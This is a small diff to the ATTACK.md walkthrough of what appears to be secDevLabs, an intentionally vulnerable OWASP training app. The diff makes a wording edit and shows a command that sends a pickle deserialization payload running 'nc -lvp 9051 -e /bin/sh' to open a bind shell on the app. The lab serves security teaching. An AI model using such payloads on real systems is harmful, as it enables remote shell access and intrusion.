globocom/secDevLabs/owasp-top10-2017-apps/a8/amarelo-designs/docs/ATTACK.md

 <img src="attack9.png" align="center"/>

-In order to show how an attacker could have access to the server through an RCE, we will use the code depicted on the image below to create a bind shell on the server on the 9051 port.
+In order to show how an attacker could have access to the server through a RCE, we will use the code depicted on the image below to create a bind shell on the server's 9051 port.

 ```sh
 $ python serializaPickle.py "nc -lvp 9051 -e /bin/sh" http://localhost:5000/user